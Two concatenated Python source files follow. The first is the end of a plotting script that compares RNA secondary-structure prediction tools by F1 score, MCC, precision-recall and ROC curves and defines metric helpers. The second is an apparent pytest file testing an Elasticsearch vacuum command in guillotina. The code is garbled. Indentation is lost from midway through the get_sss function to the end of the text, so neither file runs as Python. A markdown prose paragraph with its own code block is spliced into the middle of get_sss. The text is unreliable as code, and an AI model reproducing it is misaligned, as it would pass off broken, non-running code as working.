line_6, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_centroidalifold_f1_scores), max(probcons_plus_centroidalifold_f1_scores), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_petfold_f1_scores), max(probcons_plus_petfold_f1_scores), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.legend(handles = [line_5, line_6, line_7], loc = "lower right")
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_css_estimation_probcons.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT.
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_plus_consalifold_f1_scores, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, mafft_plus_centroidalifold_f1_scores, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, mafft_plus_petfold_f1_scores, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., mafft_plus_rnaalifold_f1_score, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_consalifold_f1_scores), max(mafft_plus_consalifold_f1_scores), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_centroidalifold_f1_scores), max(mafft_plus_centroidalifold_f1_scores), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_petfold_f1_scores), max(mafft_plus_petfold_f1_scores), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.legend(handles = [line_5, line_6, line_7], loc = "lower right")
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_css_estimation_mafft.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ClustalW.
pyplot.figure()
line_1, = pyplot.plot(gammas, clustalw_plus_consalifold_f1_scores, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, clustalw_plus_centroidalifold_f1_scores, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, clustalw_plus_petfold_f1_scores, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., clustalw_plus_rnaalifold_f1_score, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_consalifold_f1_scores), max(clustalw_plus_consalifold_f1_scores), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_centroidalifold_f1_scores), max(clustalw_plus_centroidalifold_f1_scores), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_petfold_f1_scores), max(clustalw_plus_petfold_f1_scores), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.legend(handles = [line_5, line_6, line_7], loc = "lower right")
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_css_estimation_clustalw.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT X-INS-i.
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_xinsi_plus_consalifold_f1_scores, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, mafft_xinsi_plus_centroidalifold_f1_scores, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, mafft_xinsi_plus_petfold_f1_scores, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., mafft_xinsi_plus_rnaalifold_f1_score, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_consalifold_f1_scores), max(mafft_xinsi_plus_consalifold_f1_scores), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_centroidalifold_f1_scores), max(mafft_xinsi_plus_centroidalifold_f1_scores), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_petfold_f1_scores), max(mafft_xinsi_plus_petfold_f1_scores), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.legend(handles = [line_5, line_6, line_7], loc = "lower right")
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_css_estimation_mafft_xinsi.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for reference sequence alignments.
pyplot.figure()
line_1, = pyplot.plot(gammas, ref_sa_plus_consalifold_f1_scores, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, ref_sa_plus_centroidalifold_f1_scores, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, ref_sa_plus_petfold_f1_scores, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., ref_sa_plus_rnaalifold_f1_score, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_consalifold_f1_scores), max(ref_sa_plus_consalifold_f1_scores), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_centroidalifold_f1_scores), max(ref_sa_plus_centroidalifold_f1_scores), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_petfold_f1_scores), max(ref_sa_plus_petfold_f1_scores), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.legend(handles = [line_5, line_6, line_7], loc = "lower right")
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_css_estimation_ref_sa.eps", bbox_inches = "tight")
pyplot.clf()
# Gamma versus Matthews correlation coefficient; figure for ProbCons.
pyplot.figure()
line_1, = pyplot.plot(gammas, probcons_plus_consalifold_mccs, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, probcons_plus_centroidalifold_mccs, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, probcons_plus_petfold_mccs, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., probcons_plus_rnaalifold_mcc, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_consalifold_mccs), max(probcons_plus_consalifold_mccs), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_centroidalifold_mccs), max(probcons_plus_centroidalifold_mccs), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(probcons_plus_petfold_mccs), max(probcons_plus_petfold_mccs), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_css_estimation_probcons.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT.
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_plus_consalifold_mccs, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, mafft_plus_centroidalifold_mccs, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, mafft_plus_petfold_mccs, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., mafft_plus_rnaalifold_mcc, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_consalifold_mccs), max(mafft_plus_consalifold_mccs), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_centroidalifold_mccs), max(mafft_plus_centroidalifold_mccs), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_plus_petfold_mccs), max(mafft_plus_petfold_mccs), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_css_estimation_mafft.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for ClustalW.
pyplot.figure()
line_1, = pyplot.plot(gammas, clustalw_plus_consalifold_mccs, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, clustalw_plus_centroidalifold_mccs, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, clustalw_plus_petfold_mccs, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., clustalw_plus_rnaalifold_mcc, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_consalifold_mccs), max(clustalw_plus_consalifold_mccs), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_centroidalifold_mccs), max(clustalw_plus_centroidalifold_mccs), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(clustalw_plus_petfold_mccs), max(clustalw_plus_petfold_mccs), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_css_estimation_clustalw.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for MAFFT X-INS-i.
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_xinsi_plus_consalifold_mccs, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, mafft_xinsi_plus_centroidalifold_mccs, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, mafft_xinsi_plus_petfold_mccs, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., mafft_xinsi_plus_rnaalifold_mcc, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_consalifold_mccs), max(mafft_xinsi_plus_consalifold_mccs), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_centroidalifold_mccs), max(mafft_xinsi_plus_centroidalifold_mccs), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_petfold_mccs), max(mafft_xinsi_plus_petfold_mccs), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_css_estimation_mafft_xinsi.eps", bbox_inches = "tight")
pyplot.clf()
# Figure for reference sequence alignments.
pyplot.figure()
line_1, = pyplot.plot(gammas, ref_sa_plus_consalifold_mccs, label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, ref_sa_plus_centroidalifold_mccs, label = "CentroidAlifold", marker = "s", linestyle = "--")
line_3, = pyplot.plot(gammas, ref_sa_plus_petfold_mccs, label = "PETfold", marker = "^", linestyle = "-.")
line_4, = pyplot.plot(-2., ref_sa_plus_rnaalifold_mcc, label = "RNAalifold", marker = "v", linestyle = ":")
line_5, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_consalifold_mccs), max(ref_sa_plus_consalifold_mccs), label = "ConsAlifold (ConsProb)", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_6, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_centroidalifold_mccs), max(ref_sa_plus_centroidalifold_mccs), label = "CentroidAlifold", marker = "s", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[1])
line_7, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_petfold_mccs), max(ref_sa_plus_petfold_mccs), label = "PETfold", marker = "^", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[2])
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_css_estimation_ref_sa.eps", bbox_inches = "tight")
pyplot.clf()
# Figure comparing against the other types of estimation methods.
pyplot.figure()
line_1, = pyplot.plot(mafft_xinsi_plus_consalifold_ppvs, mafft_xinsi_plus_consalifold_senss, label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-")
line_2, = pyplot.plot(ref_sa_plus_consalifold_ppvs, ref_sa_plus_consalifold_senss, label = "Reference + ConsAlifold", marker = "s", linestyle = "-")
line_3, = pyplot.plot(centroidhomfold_ppvs, centroidhomfold_senss, label = "CentroidHomfold", marker = "^", linestyle = "--")
line_4, = pyplot.plot(locarna_ppv, locarna_sens, label = "LocARNA", marker = "v", linestyle = "-")
line_5, = pyplot.plot(raf_ppv, raf_sens, label = "RAF", marker = "d", linestyle = "-")
line_6, = pyplot.plot(turbofold_ppvs, turbofold_senss, label = "TurboFold", marker = "p", linestyle = "-.")
pyplot.legend(handles = [line_1, line_2, line_3, line_4, line_5, line_6], loc = "lower left")
pyplot.xlabel("Precision")
pyplot.ylabel("Recall")
image_dir_path = asset_dir_path + "/images"
if not os.path.exists(image_dir_path):
    os.mkdir(image_dir_path)
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/pr_curves_on_ss_estimation_other_types.eps", bbox_inches = "tight")
pyplot.clf()
pyplot.figure()
line_1, = pyplot.plot(mafft_xinsi_plus_consalifold_fprs, mafft_xinsi_plus_consalifold_senss, label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-")
line_2, = pyplot.plot(ref_sa_plus_consalifold_fprs, ref_sa_plus_consalifold_senss, label = "Reference + ConsAlifold", marker = "s", linestyle = "-")
line_3, = pyplot.plot(centroidhomfold_fprs, centroidhomfold_senss, label = "CentroidHomfold", marker = "^", linestyle = "--")
line_4, = pyplot.plot(locarna_fpr, locarna_sens, label = "LocARNA", marker = "v", linestyle = "-")
line_5, = pyplot.plot(raf_fpr, raf_sens, label = "RAF", marker = "d", linestyle = "-")
line_6, = pyplot.plot(turbofold_fprs, turbofold_senss, label = "TurboFold", marker = "p", linestyle = "-.")
pyplot.xlabel("Fall-out")
pyplot.ylabel("Recall")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/roc_curves_on_ss_estimation_other_types.eps", bbox_inches = "tight")
pyplot.clf()
gammas = list(range(min_gamma, max_gamma + 1))
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_xinsi_plus_consalifold_f1_scores, label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, ref_sa_plus_consalifold_f1_scores, label = "Reference + ConsAlifold", marker = "s", linestyle = "-")
line_3, = pyplot.plot(gammas, centroidhomfold_f1_scores, label = "CentroidHomfold", marker = "^", linestyle = "--")
line_4, = pyplot.plot(-3., locarna_f1_score, label = "LocARNA", marker = "v", linestyle = "-", zorder = 9)
line_5, = pyplot.plot(-3., raf_f1_score, label = "RAF", marker = "d", linestyle = "-", zorder = 10)
line_6, = pyplot.plot(gammas, turbofold_f1_scores, label = "TurboFold", marker = "p", linestyle = "-.")
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_consalifold_f1_scores), max(mafft_xinsi_plus_consalifold_f1_scores), label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_8, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_consalifold_f1_scores), max(ref_sa_plus_consalifold_f1_scores), label = "Reference + ConsAlifold", marker = "s", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[1])
line_9, = pyplot.plot(min_gamma + numpy.argmax(centroidhomfold_f1_scores), max(centroidhomfold_f1_scores), label = "CentroidHomfold", marker = "^", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[2])
line_10, = pyplot.plot(min_gamma + numpy.argmax(turbofold_f1_scores), max(turbofold_f1_scores), label = "TurboFold", marker = "p", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[5])
pyplot.legend(handles = [line_7, line_8, line_9, line_10], loc = "lower right")
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("F1 score")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_f1_scores_on_ss_estimation_other_types.eps", bbox_inches = "tight")
pyplot.clf()
pyplot.figure()
line_1, = pyplot.plot(gammas, mafft_xinsi_plus_consalifold_mccs, label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-")
line_2, = pyplot.plot(gammas, ref_sa_plus_consalifold_mccs, label = "Reference + ConsAlifold", marker = "s", linestyle = "-")
line_3, = pyplot.plot(gammas, centroidhomfold_mccs, label = "CentroidHomfold", marker = "^", linestyle = "--")
line_4, = pyplot.plot(-3., locarna_mcc, label = "LocARNA", marker = "v", linestyle = "-", zorder = 9)
line_5, = pyplot.plot(-3., raf_mcc, label = "RAF", marker = "d", linestyle = "-", zorder = 10)
line_6, = pyplot.plot(gammas, turbofold_mccs, label = "TurboFold", marker = "p", linestyle = "-.")
line_7, = pyplot.plot(min_gamma + numpy.argmax(mafft_xinsi_plus_consalifold_mccs), max(mafft_xinsi_plus_consalifold_mccs), label = "MAFFT X-INS-i + ConsAlifold", marker = "o", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[0])
line_8, = pyplot.plot(min_gamma + numpy.argmax(ref_sa_plus_consalifold_mccs), max(ref_sa_plus_consalifold_mccs), label = "Reference + ConsAlifold", marker = "s", linestyle = "-", markerfacecolor = white, markeredgecolor = color_palette[1])
line_9, = pyplot.plot(min_gamma + numpy.argmax(centroidhomfold_mccs), max(centroidhomfold_mccs), label = "CentroidHomfold", marker = "^", linestyle = "--", markerfacecolor = white, markeredgecolor = color_palette[2])
line_10, = pyplot.plot(min_gamma + numpy.argmax(turbofold_mccs), max(turbofold_mccs), label = "TurboFold", marker = "p", linestyle = "-.", markerfacecolor = white, markeredgecolor = color_palette[5])
pyplot.xlabel(r"$\log_2 \gamma$")
pyplot.ylabel("Matthews correlation coefficient")
pyplot.tight_layout()
pyplot.savefig(image_dir_path + "/gammas_vs_mccs_on_ss_estimation_other_types.eps", bbox_inches = "tight")
pyplot.clf()
def get_metrics(bin_counts):
    (tp, tn, fp, fn) = bin_counts
    ppv = get_ppv(tp, fp)
    sens = get_sens(tp, fn)
    fpr = get_fpr(tn, fp)
    f1_score = get_f1_score(ppv, sens)
    mcc = get_mcc(tp, tn, fp, fn)
    return ppv, sens, fpr, f1_score, mcc
def get_bin_counts(params):
    rna_seq_lens, estimated_css, ref_css = params
    num_of_rnas = len(rna_seq_lens)
    tp = fp = tn = fn = 0
    for m in range(num_of_rnas):
        sub_estimated_css = estimated_css[m]
        sub_ref_css = ref_css[m]
        rna_seq_len_1 = rna_seq_lens[m]
        for i in range(rna_seq_len_1):
            for j in range(i + 1, rna_seq_len_1):
                estimated_bin = (i, j) in sub_estimated_css
                ref_bin = (i, j) in sub_ref_css
                if estimated_bin == ref_bin:
                    if estimated_bin:
                        tp += 1
                    else:
                        tn += 1
                else:
                    if estimated_bin:
                        fp += 1
                    else:
                        fn += 1
    return tp, tn, fp, fn
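# A minimal worked example (hypothetical data, not part of the benchmark
# pipeline) of the confusion counting performed by get_bin_counts above:
# for a length-6 sequence, comparing an estimated structure {(0, 5), (1, 4)}
# against a reference {(0, 5), (2, 3)} over all C(6, 2) = 15 candidate
# position pairs yields tp = 1, tn = 12, fp = 1, fn = 1.
def _demo_bin_counts():
    seq_len = 6
    estimated = {(0, 5): True, (1, 4): True}
    ref = {(0, 5): True, (2, 3): True}
    tp = tn = fp = fn = 0
    for i in range(seq_len):
        for j in range(i + 1, seq_len):
            estimated_bin = (i, j) in estimated
            ref_bin = (i, j) in ref
            if estimated_bin == ref_bin:
                if estimated_bin:
                    tp += 1
                else:
                    tn += 1
            else:
                if estimated_bin:
                    fp += 1
                else:
                    fn += 1
    return tp, tn, fp, fn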
def final_sum(results):
    final_tp = final_tn = final_fp = final_fn = 0.
    for tp, tn, fp, fn in results:
        final_tp += tp
        final_tn += tn
        final_fp += fp
        final_fn += fn
    return (final_tp, final_tn, final_fp, final_fn)
def get_f1_score(ppv, sens):
    return 2 * ppv * sens / (ppv + sens)
def get_mcc(tp, tn, fp, fn):
    return (tp * tn - fp * fn) / sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
def get_ppv(tp, fp):
    return tp / (tp + fp)
def get_sens(tp, fn):
    return tp / (tp + fn)
def get_fpr(tn, fp):
    return fp / (tn + fp)
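# A self-contained sanity check (toy numbers, not called by the script) for
# the metric formulas above: with tp = 8, tn = 85, fp = 2, fn = 5, precision
# is 8/10, recall is 8/13, and fall-out is 2/87. The square root is taken
# via ** 0.5 so the example needs no imports.
def _demo_metrics():
    tp, tn, fp, fn = 8.0, 85.0, 2.0, 5.0
    ppv = tp / (tp + fp)
    sens = tp / (tp + fn)
    fpr = fp / (tn + fp)
    f1_score = 2 * ppv * sens / (ppv + sens)
    mcc = (tp * tn - fp * fn) / ((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)) ** 0.5
    return ppv, sens, fpr, f1_score, mcc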
def get_sss(ss_file_path):
    sss = []
    ss_strings = [rec.seq for rec in SeqIO.parse(ss_file_path, "fasta")]
for (i, ss_string) in enumerate(ss_strings):
sss.append({})
for (left, right) in bracket_pairs:
stack = []
for (j, char) in enumerate(ss_string):
if char == left:
stack.append(j)
elif char == right:
pos = stack.pop()
sss[i][(pos, j)] = True
return sss
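`get_sss` relies on a stack-based bracket matcher over `bracket_pairs`. A standalone sketch of that inner loop (with `bracket_pairs` assumed to contain at least the round brackets) is:

```python
def parse_pairs(ss_string, bracket_pairs=(("(", ")"),)):
    # Each closing bracket pops the position of its matching opener,
    # yielding a dict keyed by (open_pos, close_pos).
    pairs = {}
    for left, right in bracket_pairs:
        stack = []
        for j, char in enumerate(ss_string):
            if char == left:
                stack.append(j)
            elif char == right:
                pairs[(stack.pop(), j)] = True
    return pairs

pairs = parse_pairs("((..))")
```

For `"((..))"` the outer pair spans positions (0, 5) and the inner pair (1, 4).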
if __name__ == "__main__":
main()
# =========================================================================== #
# guillotina_elasticsearch/tests/test_vacuum.py
# repo: vjove/guillotina_elasticsearch | license: BSD-2-Clause
# =========================================================================== #
from guillotina import task_vars
from guillotina.component import get_utility
from guillotina.db.uid import get_short_uid
from guillotina.interfaces import ICatalogUtility
from guillotina_elasticsearch.commands.vacuum import Vacuum
from guillotina_elasticsearch.interfaces import DOC_TYPE
from guillotina_elasticsearch.tests.utils import add_content
from guillotina_elasticsearch.tests.utils import run_with_retries
from guillotina_elasticsearch.tests.utils import setup_txn_on_container
import asyncio
import json
import os
import pytest
pytestmark = [pytest.mark.asyncio]
DATABASE = os.environ.get("DATABASE", "DUMMY")
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
async def test_adds_missing_elasticsearch_entry(es_requester):
async with es_requester as requester:
await add_content(requester)
search = get_utility(ICatalogUtility)
container, request, txn, tm = await setup_txn_on_container(requester)
task_vars.request.set(request)
async def _test():
assert await search.get_doc_count(container) == 110
await run_with_retries(_test, requester)
for key in await container.async_keys():
ob = await container.async_get(key)
await search.remove(container, [ob], request=request)
async def __test():
assert await search.get_doc_count(container) == 0
await run_with_retries(__test, requester)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_missing()
await vacuum.check_orphans()
assert len(vacuum.orphaned) == 0
assert len(vacuum.out_of_date) == 0
assert len(vacuum.missing) == 110
async def ___test():
assert await search.get_doc_count(container) == 110
await run_with_retries(___test, requester)
await tm.abort(txn=txn)
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
@pytest.mark.flaky(reruns=5)
async def test_updates_out_of_data_es_entries(es_requester):
async with es_requester as requester:
await add_content(requester)
await asyncio.sleep(1)
container, request, txn, tm = await setup_txn_on_container(requester)
task_vars.request.set(request)
search = get_utility(ICatalogUtility)
index_name = await search.get_container_index_name(container)
await search.update_by_query(
{"script": {"lang": "painless", "inline": "ctx._source.tid = 0"}},
indexes=[index_name],
)
async def _test():
assert await search.get_doc_count(container) == 110
await run_with_retries(_test, requester, retry_wait=1)
await asyncio.sleep(1)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_missing()
await vacuum.check_orphans()
assert len(vacuum.orphaned) == 0
assert len(vacuum.missing) == 0
assert len(vacuum.out_of_date) == 110
await tm.abort(txn=txn)
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
async def test_removes_orphaned_es_entry(es_requester):
async with es_requester as requester:
container, request, txn, tm = await setup_txn_on_container(requester)
search = get_utility(ICatalogUtility)
await search.index(
container, {"foobar": {"title": "foobar", "type_name": "Item"}}
)
async def _test():
assert await search.get_doc_count(container) == 1
await run_with_retries(_test, requester)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_orphans()
await vacuum.check_missing()
assert len(vacuum.orphaned) == 1
assert len(vacuum.missing) == 0
assert len(vacuum.out_of_date) == 0
async def __test():
assert await search.get_doc_count(container) == 0
await run_with_retries(__test, requester)
await tm.abort(txn=txn)
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
async def test_vacuum_with_sub_indexes(es_requester):
async with es_requester as requester:
await add_content(requester, num_folders=2, num_items=5, path="/db/guillotina/")
cresp, _ = await requester(
"POST",
"/db/guillotina/",
data=json.dumps(
{
"@type": "UniqueIndexContent",
"title": "UniqueIndexContent",
"id": "foobar",
}
),
)
await add_content(
requester, num_folders=2, num_items=5, path="/db/guillotina/foobar"
) # noqa
search = get_utility(ICatalogUtility)
content_index_name = (
"guillotina-db-guillotina__uniqueindexcontent-{}".format( # noqa
get_short_uid(cresp["@uid"])
)
)
container, request, txn, tm = await setup_txn_on_container(requester)
task_vars.request.set(request)
await asyncio.sleep(1)
async def _test():
assert await search.get_doc_count(container) == 13
assert (
await search.get_doc_count(index_name=content_index_name) == 12
) # noqa
await run_with_retries(_test, requester)
for key in await container.async_keys():
if key == "foobar":
continue
ob = await container.async_get(key)
await search.remove(container, [ob], request=request)
await asyncio.sleep(1)
foobar = await container.async_get("foobar")
for key in await foobar.async_keys():
ob = await foobar.async_get(key)
await search.remove(container, [ob], request=request)
await asyncio.sleep(1)
await search.index(
container, {"foobar1": {"title": "foobar", "type_name": "Item"}}
)
await search.index(
container,
{
"foobar2": {
"title": "foobar",
"type_name": "Item",
"__indexes__": [content_index_name],
}
},
)
async def __test():
assert await search.get_doc_count(container) == 2
assert (
await search.get_doc_count(index_name=content_index_name) == 1
) # noqa
await run_with_retries(__test, requester)
vacuum = Vacuum(txn, tm, container)
await vacuum.setup()
await vacuum.check_missing()
await vacuum.check_orphans()
assert len(vacuum.orphaned) == 2
assert len(vacuum.out_of_date) == 0
assert len(vacuum.missing) == 24
async def ___test():
assert await search.get_doc_count(container) == 13
assert (
await search.get_doc_count(index_name=content_index_name) == 12
) # noqa
await run_with_retries(___test, requester)
await tm.abort(txn=txn)
@pytest.mark.skipif(DATABASE == "DUMMY", reason="Not for dummy db")
async def test_reindexes_moved_content(es_requester):
async with es_requester as requester:
